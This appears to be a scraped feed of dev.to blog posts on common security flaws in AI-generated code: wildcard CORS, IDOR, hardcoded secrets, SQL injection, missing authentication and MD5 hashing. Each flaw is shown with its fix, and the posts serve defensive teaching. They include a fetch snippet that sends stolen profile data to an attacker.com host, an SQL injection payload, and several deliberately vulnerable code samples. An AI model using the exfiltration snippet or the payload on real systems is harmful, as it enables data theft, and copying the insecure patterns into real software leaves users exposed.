</ul> <p>I was setting up a new side project last month using Cursor. The AI scaffolded a clean Express server - TypeScript, middleware organized neatly, validation on the inputs. I copy-pasted it, ran it, everything worked. No CORS errors in the browser.</p> <p>Then I actually read what it wrote.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="nx">cors</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">cors</span><span class="dl">'</span><span class="p">;</span> <span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="nf">cors</span><span class="p">());</span> </code></pre> </div> <p>No configuration. <code>cors()</code> with no arguments defaults to <code>origin: '*'</code>. Every domain on the internet can make cross-origin requests to this API.</p> <p>I have seen this in every AI-scaffolded Node backend I have reviewed in the past year. Sometimes it is <code>cors()</code>, sometimes it is <code>cors({ origin: '*' })</code> written out explicitly. The result is the same.</p> <h2> What Wildcard CORS Actually Allows </h2> <p>CORS controls which origins can make cross-origin requests from browsers. The wildcard <code>*</code> means all of them.</p> <p>For a public read-only API, that is probably fine. For anything with authentication - cookies, JWT tokens in headers, session IDs - it is not.</p> <p>Here is a concrete scenario. Your app sets a session cookie on login. A user logs in and stays logged in. Later they visit a different site - malicious or just compromised. That site runs this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Any site can run this in a visitor's browser</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://yourapp.com/api/user/profile</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">credentials</span><span class="p">:</span> <span class="dl">'</span><span class="s1">include</span><span class="dl">'</span> <span class="c1">// sends the user's session cookie</span> <span class="p">})</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">r</span> <span class="o">=&gt;</span> <span class="nx">r</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// exfiltrate to attacker's server</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/collect</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">method</span><span class="p">:</span> <span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="na">body</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">});</span> <span class="p">});</span> </code></pre> </div> <p>If your CORS policy allows that origin and the browser includes the session cookie, your API responds as if it is the legitimate user. The attacker gets the data.</p> <p>Browsers actually block <code>origin: '*'</code> combined with <code>credentials: true</code> - they refuse to send credentials to a wildcard origin. But a misconfigured explicit allowlist with credentials is very much a real attack path, and <code>cors()</code> with no arguments leaves you one config change away from that.</p> <h2> Why AI Keeps Generating This </h2> <p>Every CORS tutorial starts the same way. Developer gets a CORS error. Stack Overflow answer: add <code>app.use(cors())</code> to your Express server. It works. Tutorial ends.</p> <p>The "configure it properly for production" step is either missing entirely or buried in a footnote. LLMs trained on this corpus learned that CORS configuration means <code>cors()</code> or <code>origin: '*'</code>. The pattern for explicit production-safe origin lists shows up far less consistently in training data.</p> <p>Same story as hardcoded secrets and weak crypto. AI learned the "get it working in dev" version of the solution, not the "safe to ship" version.</p> <h2> The Fix </h2> <p>Replace the wildcard with an explicit list of allowed origins.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">allowedOrigins</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">https://yourapp.com</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">https://www.yourapp.com</span><span class="dl">'</span><span class="p">,</span> <span class="p">];</span> <span class="k">if </span><span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">NODE_ENV</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">development</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="nx">allowedOrigins</span><span class="p">.</span><span class="nf">push</span><span class="p">(</span><span class="dl">'</span><span class="s1">http://localhost:3000</span><span class="dl">'</span><span class="p">);</span> <span class="nx">allowedOrigins</span><span class="p">.</span><span class="nf">push</span><span class="p">(</span><span class="dl">'</span><span class="s1">http://localhost:5173</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// Vite</span> <span class="p">}</span> <span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="nf">cors</span><span class="p">({</span> <span class="na">origin</span><span class="p">:</span> <span class="p">(</span><span class="nx">origin</span><span class="p">,</span> <span class="nx">callback</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// Allow requests with no Origin header: curl, Postman, mobile apps, server-to-server</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">origin</span><span class="p">)</span> <span class="k">return</span> <span class="nf">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">allowedOrigins</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="nx">origin</span><span class="p">))</span> <span class="p">{</span> <span class="nf">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nf">callback</span><span class="p">(</span><span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="s2">`Origin </span><span class="p">${</span><span class="nx">origin</span><span class="p">}</span><span class="s2"> not allowed`</span><span class="p">));</span> <span class="p">}</span> <span class="p">},</span> <span class="na">credentials</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="na">methods</span><span class="p">:</span> <span class="p">[</span><span class="dl">'</span><span class="s1">GET</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">PUT</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">DELETE</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">OPTIONS</span><span class="dl">'</span><span class="p">],</span> <span class="na">allowedHeaders</span><span class="p">:</span> <span class="p">[</span><span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Authorization</span><span class="dl">'</span><span class="p">],</span> <span class="p">}));</span> </code></pre> </div> <p>The <code>!origin</code> check matters. Server-to-server requests, curl calls, and requests from mobile apps do not send an Origin header. Without that check, you break legitimate non-browser clients.</p> <p>For APIs that genuinely need to be public - open data endpoints, public SDKs - <code>origin: '*'</code> is fine. Just make sure credentials are not involved and the data really is public.</p> <p>Quick audit: search your codebase for <code>cors()</code> with no arguments and for <code>origin: '*'</code>. Either one in a backend that handles user sessions is worth a second look.</p> <p>I have been using <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> to catch this. It flags wildcard CORS in the posture scanner alongside missing rate limiting and CSRF issues. That said, a grep for <code>cors()</code> in your server files takes ten seconds and finds the same thing. The important thing is not letting it reach production, whatever method you use.</p> security webdev ai devsecops The Access Control Bug Your AI Copilot Skips Every Time BusyAgents Thu, 19 Mar 2026 15:25:08 +0000 https://dev.to/busyagents/the-access-control-bug-your-ai-copilot-skips-every-time-2pkk https://dev.to/busyagents/the-access-control-bug-your-ai-copilot-skips-every-time-2pkk <h2> TL;DR </h2> <ul> <li>AI-generated API endpoints authenticate users but routinely forget ownership checks</li> <li>Any logged-in user can read, edit, or delete another user's data by guessing IDs</li> <li>One <code>if</code> statement is the difference between a secure API and a data breach</li> </ul> <p>I was doing a code review for a friend's SaaS a few weeks back. Invoice management app, small team, paying customers. The auth was solid. JWT tokens, proper middleware, refresh tokens done right. I was actually impressed until I hit the invoice endpoints.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/invoices/:id</span><span class="dl">'</span><span class="p">,</span> <span class="nx">authenticate</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">invoice</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">Invoice</span><span class="p">.</span><span class="nf">findById</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">invoice</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>No ownership check. Any authenticated user could hit <code>/api/invoices/1</code>, <code>/api/invoices/2</code>, all the way up. Customer data, completely exposed to any other customer who figured out the pattern. The app had been live for three months.</p> <p>The dev built the whole backend with Cursor. Every endpoint had authentication middleware. None of them had authorization.</p> <h2> What IDOR Actually Looks Like </h2> <p>This is IDOR - Insecure Direct Object Reference (CWE-639). The name sounds academic. What it means in practice: your API trusts that any logged-in user should be able to access any resource if they know the ID.</p> <p>Here's the pattern AI generates consistently:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// GET a document</span> <span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/documents/:id</span><span class="dl">'</span><span class="p">,</span> <span class="nx">authenticate</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">doc</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">Document</span><span class="p">.</span><span class="nf">findById</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">doc</span><span class="p">)</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="mi">404</span><span class="p">).</span><span class="nf">json</span><span class="p">({</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Not found</span><span class="dl">'</span> <span class="p">});</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">doc</span><span class="p">);</span> <span class="p">});</span> <span class="c1">// Update a document</span> <span class="nx">app</span><span class="p">.</span><span class="nf">put</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/documents/:id</span><span class="dl">'</span><span class="p">,</span> <span class="nx">authenticate</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">doc</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">Document</span><span class="p">.</span><span class="nf">findById</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="k">await</span> <span class="nx">doc</span><span class="p">.</span><span class="nf">updateOne</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">({</span> <span class="na">success</span><span class="p">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="p">});</span> <span class="c1">// Delete a document</span> <span class="nx">app</span><span class="p">.</span><span class="k">delete</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/documents/:id</span><span class="dl">'</span><span class="p">,</span> <span class="nx">authenticate</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">Document</span><span class="p">.</span><span class="nf">findByIdAndDelete</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">({</span> <span class="na">success</span><span class="p">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="p">});</span> </code></pre> </div> <p>Authentication passes. The resource exists. Request goes through. What's missing is one check: does <code>req.user.id</code> match <code>doc.userId</code>?</p> <p>MongoDB ObjectIDs aren't sequential but they're not secret. Auto-increment integer IDs are trivially enumerable. Either way, an attacker with a valid session token can walk through IDs and pull data that isn't theirs.</p> <h2> Why AI Keeps Missing This </h2> <p>The training data explanation is pretty simple. Most tutorial code on the internet - Stack Overflow answers, blog posts, course projects - demonstrates authentication but not authorization. "Here's how to protect a route with a JWT" is a complete tutorial. "Here's how to verify this user owns this specific document" is left as an exercise or skipped entirely.</p> <p>LLMs learn patterns. The pattern for a protected endpoint is: middleware + fetch by ID + return data. The ownership check doesn't appear consistently enough in training data to become part of the default output.</p> <p>I've reviewed around 20 AI-generated backends in the past few months. All of them had authentication. About four had proper ownership checks on every endpoint.</p> <h2> The Fix </h2> <p>One line of code. Sometimes two.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/documents/:id</span><span class="dl">'</span><span class="p">,</span> <span class="nx">authenticate</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">doc</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">Document</span><span class="p">.</span><span class="nf">findById</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">doc</span><span class="p">)</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="mi">404</span><span class="p">).</span><span class="nf">json</span><span class="p">({</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Not found</span><span class="dl">'</span> <span class="p">});</span> <span class="c1">// This is the line AI forgets</span> <span class="k">if </span><span class="p">(</span><span class="nx">doc</span><span class="p">.</span><span class="nx">userId</span><span class="p">.</span><span class="nf">toString</span><span class="p">()</span> <span class="o">!==</span> <span class="nx">req</span><span class="p">.</span><span class="nx">user</span><span class="p">.</span><span class="nx">id</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="mi">403</span><span class="p">).</span><span class="nf">json</span><span class="p">({</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Forbidden</span><span class="dl">'</span> <span class="p">});</span> <span class="p">}</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">doc</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>For shared resources where multiple users can access the same document:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">hasAccess</span> <span class="o">=</span> <span class="nx">doc</span><span class="p">.</span><span class="nx">userId</span><span class="p">.</span><span class="nf">toString</span><span class="p">()</span> <span class="o">===</span> <span class="nx">req</span><span class="p">.</span><span class="nx">user</span><span class="p">.</span><span class="nx">id</span> <span class="o">||</span> <span class="nx">doc</span><span class="p">.</span><span class="nx">sharedWith</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">user</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">hasAccess</span><span class="p">)</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="mi">403</span><span class="p">).</span><span class="nf">json</span><span class="p">({</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Forbidden</span><span class="dl">'</span> <span class="p">});</span> </code></pre> </div> <p>The 404 vs 403 question is worth considering. Returning 404 for unauthorized resources leaks less about what exists in your system. Returning 403 is more transparent about what happened. Pick based on your threat model.</p> <p>If you have many endpoints, pull the check into middleware so it happens once and every new route gets it automatically:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">requireOwnership</span> <span class="o">=</span> <span class="p">(</span><span class="nx">Model</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">,</span> <span class="nx">next</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">doc</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">Model</span><span class="p">.</span><span class="nf">findById</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">doc</span><span class="p">)</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="mi">404</span><span class="p">).</span><span class="nf">json</span><span class="p">({</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Not found</span><span class="dl">'</span> <span class="p">});</span> <span class="k">if </span><span class="p">(</span><span class="nx">doc</span><span class="p">.</span><span class="nx">userId</span><span class="p">.</span><span class="nf">toString</span><span class="p">()</span> <span class="o">!==</span> <span class="nx">req</span><span class="p">.</span><span class="nx">user</span><span class="p">.</span><span class="nx">id</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="mi">403</span><span class="p">).</span><span class="nf">json</span><span class="p">({</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Forbidden</span><span class="dl">'</span> <span class="p">});</span> <span class="p">}</span> <span class="nx">req</span><span class="p">.</span><span class="nx">resource</span> <span class="o">=</span> <span class="nx">doc</span><span class="p">;</span> <span class="nf">next</span><span class="p">();</span> <span class="p">};</span> <span class="c1">// Usage</span> <span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/documents/:id</span><span class="dl">'</span><span class="p">,</span> <span class="nx">authenticate</span><span class="p">,</span> <span class="nf">requireOwnership</span><span class="p">(</span><span class="nx">Document</span><span class="p">),</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">resource</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>Quick audit trick: search your codebase for <code>findById</code>, <code>findByPk</code>, or <code>findOne</code> where the filter is just an ID from <code>req.params</code>. Any result without a <code>.userId</code> condition or ownership check nearby is a candidate for review.</p> <p>I've been running <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> for this. It hooks into Cursor and Claude Code as an MCP server and flags missing ownership checks in AI-generated endpoints. That said, the grep approach above will get you most of the way there without any tooling. The important thing is checking before you ship, whatever method you use.</p> security webdev ai devsecops The 4 Security Bugs Your AI Copilot Writes Every Single Time BusyAgents Wed, 18 Mar 2026 19:07:11 +0000 https://dev.to/busyagents/the-4-security-bugs-your-ai-copilot-writes-every-single-time-35e1 https://dev.to/busyagents/the-4-security-bugs-your-ai-copilot-writes-every-single-time-35e1 <p><strong>TL;DR</strong></p> <ul> <li>AI editors produce syntactically clean code that is semantically insecure</li> <li>The same 4 vulnerability patterns show up across almost every AI-generated codebase</li> <li>They're all fixable in minutes, if you know what to look for</li> </ul> <p>I scanned a production app last week. Clean TypeScript, well-organized folders, decent test coverage. The kind of repo that looks like a senior dev wrote it.</p> <p>Also: a hardcoded Stripe API key on line 8 of <code>config.ts</code>. A SQL query built from raw string concatenation. An auth endpoint with zero rate limiting. And a password hash using MD5.</p> <p>The whole thing was built with an AI editor. And none of this is unusual.</p> <p>I've been scanning AI-generated codebases for a while now. The same patterns keep showing up, almost without exception. Not because the developers are bad. they're often quite good. It's because AI models learned from tutorial code, and tutorials never prioritize security. They prioritize clarity.</p> <p>Here are the four things I find most consistently, with the actual code patterns.</p> <h2> 1. Hardcoded Secrets (CWE-798) </h2> <p>This is the #1 find. It shows up in roughly 2 out of 3 repos.</p> <p>The AI generates something like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">stripe</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Stripe</span><span class="p">(</span><span class="dl">'</span><span class="s1">sk_live_4xKj9mNpQ2rT...</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">jwtSecret</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">my-super-secret-key-123</span><span class="dl">'</span><span class="p">;</span> </code></pre> </div> <p>It looks fine in isolation. It runs. Tests pass. Then it gets committed, pushed, and either leaked via a public repo or exposed through git history. The fix is one line. The real problem is that the AI has no reason to generate the safe version. It's optimizing for "code that works in a tutorial," and environment variables are setup friction it skips for you.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">stripe</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Stripe</span><span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">STRIPE_SECRET_KEY</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">jwtSecret</span> <span class="o">=</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">JWT_SECRET</span><span class="p">;</span> </code></pre> </div> <p>Same result. No secret in your codebase.</p> <h2> 2. SQL Injection via Template Literals (CWE-89) </h2> <p>This one consistently surprises developers because it looks modern and intentional.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// What the AI writes</span> <span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span> <span class="err">\</span><span class="s2">`SELECT * FROM users WHERE email = '</span><span class="p">${</span><span class="nx">userInput</span><span class="p">}</span><span class="s2">'</span><span class="se">\`</span><span class="s2"> ); </span></code></pre> </div> <p>Template literals feel like the "new way" of writing strings. They're perfectly fine in most contexts. In SQL queries, they're an open door. An attacker sends <code>' OR '1'='1</code> as the email input, and the query becomes <code>SELECT * FROM users WHERE email = '' OR '1'='1'</code> . Every record in the table gets returned. With the right payload, they can run <code>DROP TABLE users</code>.</p> <p>The parameterized version is just as readable:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span> <span class="dl">'</span><span class="s1">SELECT * FROM users WHERE email = $1</span><span class="dl">'</span><span class="p">,</span> <span class="p">[</span><span class="nx">userInput</span><span class="p">]</span> <span class="p">);</span> </code></pre> </div> <p>The AI could write this. It just doesn't default to it.</p> <h2> 3. Missing Auth on API Endpoints (CWE-862) </h2> <p>When you ask an AI to "create a user profile endpoint," it creates the endpoint. That's what you asked for. What you probably also wanted. auth middleware. you didn't specify, so it didn't add it.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// What gets generated</span> <span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/users/:id</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">user</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">User</span><span class="p">.</span><span class="nf">findById</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">user</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>This endpoint is wide open. Anyone who knows or can guess a user ID gets that user's full data. No session check, no token validation, nothing. The fix requires one middleware call and a role check:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/users/:id</span><span class="dl">'</span><span class="p">,</span> <span class="nx">authenticate</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">user</span><span class="p">.</span><span class="nx">id</span> <span class="o">!==</span> <span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span> <span class="o">&amp;&amp;</span> <span class="nx">req</span><span class="p">.</span><span class="nx">user</span><span class="p">.</span><span class="nx">role</span> <span class="o">!==</span> <span class="dl">'</span><span class="s1">admin</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="mi">403</span><span class="p">).</span><span class="nf">json</span><span class="p">({</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Forbidden</span><span class="dl">'</span> <span class="p">});</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">user</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">User</span><span class="p">.</span><span class="nf">findById</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">user</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>The AI doesn't make this mistake because it's careless. It makes it because auth middleware is a project-specific detail that doesn't exist in the training data for a generic endpoint example.</p> <h2> 4. Weak Password Hashing (CWE-328) </h2> <p>Less common than the others, but I still find it regularly. especially in Python backends.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># What the AI generates </span><span class="kn">import</span> <span class="n">hashlib</span> <span class="k">def</span> <span class="nf">hash_password</span><span class="p">(</span><span class="n">password</span><span class="p">):</span> <span class="k">return</span> <span class="n">hashlib</span><span class="p">.</span><span class="nf">md5</span><span class="p">(</span><span class="n">password</span><span class="p">.</span><span class="nf">encode</span><span class="p">()).</span><span class="nf">hexdigest</span><span class="p">()</span> </code></pre> </div> <p>MD5 was deprecated for password storage around 2004. It's fast. which is exactly wrong for passwords. A modern GPU can crack MD5 hashes at billions per second. If your database leaks, every password becomes plaintext within hours.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># What it should be </span><span class="kn">import</span> <span class="n">bcrypt</span> <span class="k">def</span> <span class="nf">hash_password</span><span class="p">(</span><span class="n">password</span><span class="p">):</span> <span class="k">return</span> <span class="n">bcrypt</span><span class="p">.</span><span class="nf">hashpw</span><span class="p">(</span><span class="n">password</span><span class="p">.</span><span class="nf">encode</span><span class="p">(),</span> <span class="n">bcrypt</span><span class="p">.</span><span class="nf">gensalt</span><span class="p">(</span><span class="n">rounds</span><span class="o">=</span><span class="mi">12</span><span class="p">))</span> </code></pre> </div> <p>Bcrypt is intentionally slow. That's the feature, not a bug. A work factor of 12 makes each comparison take ~250ms, which is completely fine for login but completely impractical for brute-force at scale.</p> <h2> The Underlying Problem </h2> <p>These aren't random bugs. They're systematic patterns.</p> <p>AI editors learned from code written to explain concepts, not to ship safely. Tutorial code hardcodes secrets to keep examples short. It skips auth to keep focus on the feature being demonstrated. It uses MD5 because that's what a StackOverflow answer from 2012 uses, and that answer is still indexed and still in the training data.</p> <p>When an AI writes code to be "syntactically correct and functional," it succeeds. But security is about what the code <em>doesn't</em> accept, <em>doesn't</em> expose, <em>doesn't</em> allow. That negative space is invisible in tutorials. So it's invisible in AI output.</p> <p>The real fix isn't running a scanner after the fact in CI/CD. By then you've already committed, moved on, and lost the mental context to fix it cleanly. You need something that catches this at the moment the code is generated, inside the editor. That's the workflow change that actually sticks.</p> <p>I've been running <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> for this. It hooks into Cursor and Claude Code as an MCP server and flags these patterns before I move on. That said, even a basic pre-commit hook with semgrep and gitleaks will catch most of what's in this post. The important thing is catching it early, whatever tool you use.</p> security webdev ai devsecops The hidden security cost of AI-generated code (and what to do about it) BusyAgents Sun, 15 Mar 2026 13:01:53 +0000 https://dev.to/busyagents/the-hidden-security-cost-of-ai-generated-code-and-what-to-do-about-it-36po https://dev.to/busyagents/the-hidden-security-cost-of-ai-generated-code-and-what-to-do-about-it-36po <blockquote> <p><strong>TL;DR:</strong> AI code assistants — Cursor, Claude Code, Windsurf, Copilot — are <br> reshaping how software gets built. But research shows <strong>24–45% of AI-generated <br> code contains security vulnerabilities</strong>. This post breaks down the most common <br> patterns, why they happen, and exactly how to catch them before they hit production.</p> 